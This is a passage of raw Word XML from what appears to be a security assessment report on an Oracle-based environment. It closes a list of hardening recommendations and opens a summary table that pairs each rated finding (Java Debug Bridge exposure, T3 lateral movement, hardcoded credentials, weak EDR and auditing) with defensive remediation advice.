          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Secure </w:t>
      </w:r>
      <w:r w:rsidR="00777111" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>by using Simple Authentication and Security Layer (SASL), which adds authentication and security to protocols like LDAP (used by OID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F57C0C3" w14:textId="48749B78" w:rsidR="00CA24F1" w:rsidRPr="001019D3" w:rsidRDefault="00777111" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Disable unencrypted </w:t>
      </w:r>
      <w:r w:rsidR="00B84673" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>protocol support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0374D455" w14:textId="340272DB" w:rsidR="00545A90" w:rsidRPr="001019D3" w:rsidRDefault="00545A90">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="391CBB34" w14:textId="77777777" w:rsidR="006D2C8C" w:rsidRPr="001019D3" w:rsidRDefault="006D2C8C" w:rsidP="006D2C8C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="_Toc212654670"/>
      <w:bookmarkStart w:id="213" w:name="_Toc213253577"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>List of Findings and Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w14:paraId="1E468918" w14:textId="77777777" w:rsidR="006D2C8C" w:rsidRPr="001019D3" w:rsidRDefault="006D2C8C" w:rsidP="006D2C8C">
      <w:r w:rsidRPr="001019D3">
        <w:t>The following table summarises the findings and recommendations:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1510"/>
        <w:gridCol w:w="2619"/>
        <w:gridCol w:w="4817"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B84673" w:rsidRPr="001019D3" w14:paraId="7496B026" w14:textId="77777777" w:rsidTr="002037B5">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="130610F9" w14:textId="77777777" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00B84673" w:rsidP="00EC026D">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6AC5DD39" w14:textId="77777777" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00B84673" w:rsidP="00EC026D">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="43C4B976" w14:textId="77777777" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00B84673" w:rsidP="00EC026D">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002037B5" w:rsidRPr="001019D3" w14:paraId="49280A6D" w14:textId="77777777" w:rsidTr="001F201F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F282B5D" w14:textId="02415657" w:rsidR="002037B5" w:rsidRPr="001019D3" w:rsidRDefault="001F201F" w:rsidP="00BC1BFC">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="131452C0" w14:textId="3AD83021" w:rsidR="002037B5" w:rsidRPr="001019D3" w:rsidRDefault="001F201F" w:rsidP="00BC1BFC">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Susceptibility to phishing emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0DB73990" w14:textId="613F31C9" w:rsidR="002037B5" w:rsidRPr="001019D3" w:rsidRDefault="001F201F" w:rsidP="001F201F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Provide employees with regular security awareness training and simulated phishing exercises to educate them on recognizing and reporting suspicious emails. Establish clear incident reporting procedures to quickly escalate potential threats to the security team. Implement technical safeguards, such as multi-factor authentication, to limit the impact of compromised credentials, and consider additional measures like browser isolation or link protection services to reduce exposure to malicious sites, ensuring a robust </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> against phishing attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1BFC" w:rsidRPr="001019D3" w14:paraId="721483FC" w14:textId="77777777" w:rsidTr="002037B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53F0A381" w14:textId="77505988" w:rsidR="00BC1BFC" w:rsidRPr="001019D3" w:rsidRDefault="00BC1BFC" w:rsidP="00BC1BFC">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51BD75E3" w14:textId="23EDFFD8" w:rsidR="00BC1BFC" w:rsidRPr="001019D3" w:rsidRDefault="00E224E7" w:rsidP="00BC1BFC">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Java Debug Bridge vulnerable service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6C606020" w14:textId="29C8E4C4" w:rsidR="00BC1BFC" w:rsidRPr="001019D3" w:rsidRDefault="00BC1BFC" w:rsidP="00BC1BFC">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Disable the Java Debug Bridge service if it's not needed, especially in production. If it is required, restrict access to only trusted users and networks. Additionally, use separate service accounts with limited privileges for each server and service, following the principle of least privilege, to minimize the attack surface and reduce the risk of unauthorized access or resource misuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84673" w:rsidRPr="001019D3" w14:paraId="2259819C" w14:textId="77777777" w:rsidTr="002037B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18185A3A" w14:textId="55089B43" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00BC1BFC" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="794A2A53" w14:textId="0F6491C5" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Absence of auditing of scheduled tasks allows for persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D46A864" w14:textId="23DD0110" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00721B1D" w:rsidP="00721B1D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Implement robust monitoring and access controls servers. This includes tracking changes to sensitive areas, restricting access to trusted locations, and monitoring login activity. Configure auditing, logging, and file integrity monitoring, and enforce strict change management processes to detect and prevent unauthorized activity, ensuring the security and integrity of servers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84673" w:rsidRPr="001019D3" w14:paraId="194B8D8F" w14:textId="77777777" w:rsidTr="002037B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ECDF830" w14:textId="63CDF449" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00721B1D" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EB74452" w14:textId="1530354A" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00721B1D" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Insecure credentials and secrets storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="77C4D36E" w14:textId="2F02F452" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00721B1D" w:rsidP="00721B1D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Eliminate hardcoded credentials, instead use secure secrets management solutions to store and access confidential data. Encrypt sensitive data and limit access to authorized users and systems, following the principle of least privilege. Regularly assess vulnerabilities and enable logging and alerting to detect potential security threats, ensuring the security and compliance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84673" w:rsidRPr="001019D3" w14:paraId="2DF1B72E" w14:textId="77777777" w:rsidTr="002037B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02826E23" w14:textId="02B29CD5" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00721B1D" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60C7D741" w14:textId="0F920782" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebLogic Scripting Tool (WLST) and Oracle T3 allows for lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D99CEB3" w14:textId="1D91059F" w:rsidR="00B84673" w:rsidRPr="001019D3" w:rsidRDefault="00721B1D" w:rsidP="00721B1D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Restrict access to the wlst.sh script to only high-privileged </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>users, and</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> consider removing it altogether when not in use to prevent unauthorized execution and minimize potential security risks.</w:t>
            </w:r>
            <w:r w:rsidR="009D2BB5" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Restrict access to Oracle T3 only for authorized servers and applications, and configure T3 with strong security measures, including unique passwords and authentication mechanisms. Additionally, closely monitor inter-service communication, logging and alerting on any suspicious activity, to detect and respond to potential security threats in a timely manner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D2BB5" w:rsidRPr="001019D3" w14:paraId="3EFD6904" w14:textId="77777777" w:rsidTr="009D2BB5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11015F4D" w14:textId="591543EF" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CB1D487" w14:textId="3C5228F6" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="00E224E7" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unencrypted Oracle T3 protocol allows for eavesdropping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4D332ACA" w14:textId="56A5E384" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Enforce the use of encrypted Oracle T3S (T3 over SSL) protocol on all Oracle </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>servers, and</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> disable the unencrypted T3 protocol to prevent potential eavesdropping and data breaches, ensuring all interactions are protected and secure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D2BB5" w:rsidRPr="001019D3" w14:paraId="48623A2A" w14:textId="77777777" w:rsidTr="002037B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D0D307C" w14:textId="6AA66C6F" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E09D78A" w14:textId="1E8E8FDA" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ineffective Endpoint Detection and Response (EDR) allows malicious actions to go unnoticed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0A9EC8D0" w14:textId="0515C685" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>To enhance security, implement a robust Endpoint Detection and Response (EDR) solution on all systems, and regularly test its effectiveness through simulated attacks and exercises, such as Red Team testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D2BB5" w:rsidRPr="001019D3" w14:paraId="0D0E8A61" w14:textId="77777777" w:rsidTr="007B7577">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23393618" w14:textId="0530E7EE" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64DCFA61" w14:textId="458B1F2D" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Use of high-privileged Oracle DB credentials for daily operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0C7E35E8" w14:textId="6C84D4BD" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Use dedicated accounts with limited permissions for Oracle DB operations and sensitive tasks, regularly review and audit these accounts to prevent excessive rights. Additionally, store and manage credentials securely using centralized secrets management solutions, and enable monitoring and alerting to detect and investigate any unauthorized or unusual activity, ensuring security and integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D2BB5" w:rsidRPr="001019D3" w14:paraId="4DCA9A7F" w14:textId="77777777" w:rsidTr="002037B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01DF573A" w14:textId="6A48E592" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7021F115" w14:textId="7A11B06C" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ineffective Oracle DB event auditing allows malicious actions to go unnoticed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="612AA87E" w14:textId="31C9AE2A" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Enable auditing for critical actions on Oracle DB servers, centralize and forward logs to a Security Information and Event Management (SIEM) platform, and fine-tune alerts to detect anomalies. Implement clear procedures for responding to alerts and regularly review and validate audit configurations and response workflows. Additionally, conduct periodic security exercises to test the effectiveness of the alerting and incident response processes, ensuring that potential threats are quickly detected and remediated.</w:t>
            </w:r>
